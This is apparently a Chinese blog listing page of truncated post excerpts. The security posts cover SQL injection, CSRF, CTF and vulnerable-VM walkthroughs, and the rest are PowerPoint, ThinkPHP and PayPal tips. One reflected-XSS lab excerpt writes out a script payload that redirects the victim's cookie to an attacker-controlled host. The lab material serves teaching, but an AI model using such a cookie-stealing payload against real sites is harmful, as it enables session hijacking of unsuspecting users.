PHP
SQL注入注入方式(大纲)
SQL注入注入方式(大纲) 常规注入 通常没有任何过滤,直接把参数存放到SQL语句中。 宽字节注入 GBK 编码 两个字节表示一个字符 ASCII 编码 一个字节表示一个字符 MYSQL默认字节集是GBK等宽字节字符集 原理: 设置MySQL时错误配置为set character_set_client=gbk (它将客户端字符集设置为 GBK 编码),这样会引发编码转化,导致出现注入漏洞。
CSRF(Steam的链接不用随便点)
漏洞详解 CSRF 漏洞原理: 攻击者会冒充或利用用户本人对web服务器发送请求,然而web服务器无法识别该请求是否为用户本人所发送,因此造成各种危害。 漏洞利用过程: 1)首先需要用户登录了上网站,并产生了cookie 2)构造恶意链接 3)在用户还保持着登录状态时,去诱导用用户点击链接 4)链接中的恶意脚本在用户的浏览器上执行,进而达到攻击者的目的 漏洞危害: 攻击者会利用用户的名义去进行发送
HackMyVm-venus(31-50)
HackMyVm-venus(31-50) 0x31(curl 指定UA访问) 0x32(别名) 0x33(解压缩) 0x34(strings查看字符) 0x35(后两位小写字母爆破) 0x36(二维码) 扫一下就行了 0x37(iso镜像) iso特别小直接查看字符串 0x38(两个文件的不同) 0x39(openssl解密) 0x40(莫斯电码) 0x4
CTF-Show-JWT系列
CTF-Show-JWT系列 Problem 1 前置知识 思路 尝试访问: https://d6bd63c3-e67e-477a-ba67-fc6c81604997.challenge.ctf.show/index.php/admin/ 抓包发现auth为一串base64编码,对其进行解码后发现:这是jwt认证的token。 我们仔细观察发现,该jwt采用空算法加密,这就代表着我们可以随意篡
powerpoint:幻灯片中设置打字机效果
一,指定动画 选中文字后,点工具栏 动画 标签,然后在运画效果中选 出现如图: 说明:刘宏缔的架构森林—专注it技术的博客,网址:https://imgtouch.com本文: https://blog.imgtouch.com/index.php/2024/02/25/powerpoint-huan-deng-pian-zhong-she-zhi-da-zi-ji-xiao-
powerpoint:给幻灯片每页都添加logo
一,给幻灯片每页都添加logo 1,未插入前: 2,打开母版 点工具栏上的 视图 标签,再点击 幻灯片母版 按钮: 3,点击第一个页面,再点击 工具栏上的 插入 标签: 点工具栏上的图片 按钮,从菜单中选择 来自文件的图片: 把选择的图片调整好位置和大小,在工具栏点击 关闭母版 按钮: 添加完成后在页面上的效果: 说明:刘宏缔的架构森林—专注it技术的博客,网址:https://img
Prefab优化:预制体最有效
我们针对UWA本地资源检测最新的Shader Analyzer功能所涉及到的新规则和相关知识点进行了讲解。 这些看似细小的知识点,很容易在大家的开发和学习过程中被疏忽,而长期的问题积累最终都会反映到项目的性能表现上。 为此,我们将这些规则列出,并且以一个个知识点的形式向大家逐一解读。 参考: 我们将继续讲解UWA本地资源检测中和Prefab相关的规则:“使用了Outline的Text组件”、“使用
Hackademic.RTB
信息收集 靶机启动 IP扫描 端口扫描 22 没有开放 80 开放 目录扫描 SQL注入 确认注入点 手动访问80端口 欢迎进入黑客学院的挑战 请进入 targer 努力获取 toot 权限 跳转后可以看到进入了hackademic_rtb1目录, 这里说目标 goal 要读取root/key.txt文件 看源代码 看到cms 是wordpress的1.5.1.1
ThinkPHP6实现增删改查接口
ThinkPHP增删改查接口实现 数据库连接配置 当.env文件中存在数据库配置时,这些配置会覆盖config/database.php中的相应配置。 通常在config/database.php中设置数据库连接的默认值或开发环境的值,并在.env文件中根据实际部署环境(如测试或生产环境)覆盖这些值。这样,你可以通过更改环境变量来调整配置,而无需修改代码中的配置文件,这有助于提高应用的安全性和灵活
VScode 配置php调试环境变量. phpstudy + nginx+ php7.4, 解决无法断点问题
参考大佬的帖子 https://blog.csdn.net/qq_61739597/article/details/132433472 (远程调试) 踩坑经验 我从phpstudy 添加好网站才进行配置. 当配置好之后,一直没有断点下来. 非常郁闷找不到问题. 写了一个demo, php文件, 通过phpstudy添加网站发现可以断点下来 后来果断重新添加一下
直播系统源代码,iOS端截屏时隐藏内容
直播系统源代码,iOS 禁止截屏,手机截屏时隐藏内容,或自定义截屏后的内容。核心是利用UITextField的secureTextEntry属性隐藏内容,注意该功能仅iOS13.2及以上支持。UITextField在开启密码模式后,在截屏录屏时隐藏一个子视图。注:模拟器左上角的截图不支持UITextField的密码隐藏。如果要模拟真机截图,可以点击模拟器菜单 Device->Trigger
直播系统app源码,Android端与屏幕相关的几个注意事项
直播系统app源码,Android端与屏幕相关的几个注意事项 Android端的宽屏适配、禁止截屏和保持屏幕常亮,是直播系统app源码开发时需要注意的三个重要事项。 宽屏适配 越来越多的手机厂商趋向于全面屏设计,屏幕比例均超过过去常见的 16:9 比例。超大屏幕比例的设计对于 Android App 来说,存在一个屏幕适配的问题。我们需要在 Manifest 清单文件中定义一个更大值
P10189 [USACO24FEB] Maximizing Productivity B 题解
先说说暴力做法: 每次遍历一遍,看看是否满足 (t_i + s le c_i),满足就计数,不满足就挂。单次时间复杂度显然为 (O(N)),总得时间复杂度约为 (O(NQ)),TLE是肯定的~ 暴力代码 评测记录,开了优化也只有 20pts。 暴力废了,开始整正解。 (2 times 10^5)?二分法,了解一下? 然后,然后遇到了个问题:二分这东西要求有序,可是 (c_i) 与 (t_i
PHP.安装SQL SERVER 驱动
01. 取phpinfo 信息; 02. 登陆网址,查对应版本的文件下载: https://learn.microsoft.com/en-us/sql/connect/php/release-notes-php-sql-driver?view=sql-server-ver16#previous-releases 下载文件后,将文件解压到任何指定的目录 ; 按01步骤的内容,直接取驱
cyi青少年CTF擂台挑战赛 2024 #Round 1 wp
WEB EasyMD5 靶机真不敢恭维 一个文件上传界面,得上传pdf 传两个pdf 这篇文章看到md5碰撞,找到个工具fastcoll_v1.0.0.5 https://www.win.tue.nl/hashclash/ 后续写的wp,flag可能不同 PHP的后门 https://blog.csdn.net/Shadow_DAI_990101/article/details/126
接入PayPal支付
注:最底部有sdk的代码文档说明,如是代码问题可直接参考底部官方sdk文档 安装SDK 生成支付链接 图01 图02(注:测试支付时,在沙箱模式下用沙箱个人账号登录就可以支付,企业账号那是收款账号) 选择支付方式,点击继续查看订单就能跳转到支付成功的地方了 WebHook 从参考图01中的Default Application点击进去,在最底部有个Add
对 uri分析获取mime type和 raw data
data:image/png;base64,iVBORw0KCYII= data:text/html;base64,PCFET0NUWVBFIGh0bWw+DQo8aHRtDQo= 原始数据格式 data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAcAAAAOCAYAAADjXQYbAAAAAXNSR0IArs4c6QAAAARnQU1BA
【HMS Core】应用内支付成功后,返回结果验签失败
【问题描述】 应用内支付成功后,返回结果验签失败 【解决方案】 验签失败可以从以下几点进行逐一排查 1.签名算法是否匹配 (可以通过获取getSignatureAlgorithm 来验证目前使用的签名算法) 2.签名公钥是否正确 确保公钥获取正确,签名算法如果打开了SHA256WithRSA/PSS,则建议关闭,或者代码匹配。 3.待签名字符串是否正确 打印下对应的字段
反射型xss的post请求获取cookie
攻击者构造的网站地址:192.168.10.12:100 受害者主机:192.168.10.134 目标服务器:192.168.10.1 步骤一: 受害者主机访问目标服务器 根据提示登录 步骤二: 输入xss Payload <script>document.location = 'http://192.168.10.12:100/pkxss/xcookie/cookie.php?c
MySQL 及 SQL 注入
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户
拯救php性能的神器webman-初入门
无意间发现的这个神器webman,真是秋名山上的腾源拓海! 该框架是workerman下的一个web开发的生态,我们可以先看看这里workerman的官方网站。 workerman早有耳闻,知道它蛮厉害的,跟swoole也不相上下,这次主要是说webman,可以看这里 话不多说,赶紧上手。 1. 安装 这个安装真的很简单,就一句话 composer create
think-swoole的一些坑
一、php连接websocket服务器内部通信 1.1、安装ratchet/pawl composer require ratchet/pawl 1.2、代码示例: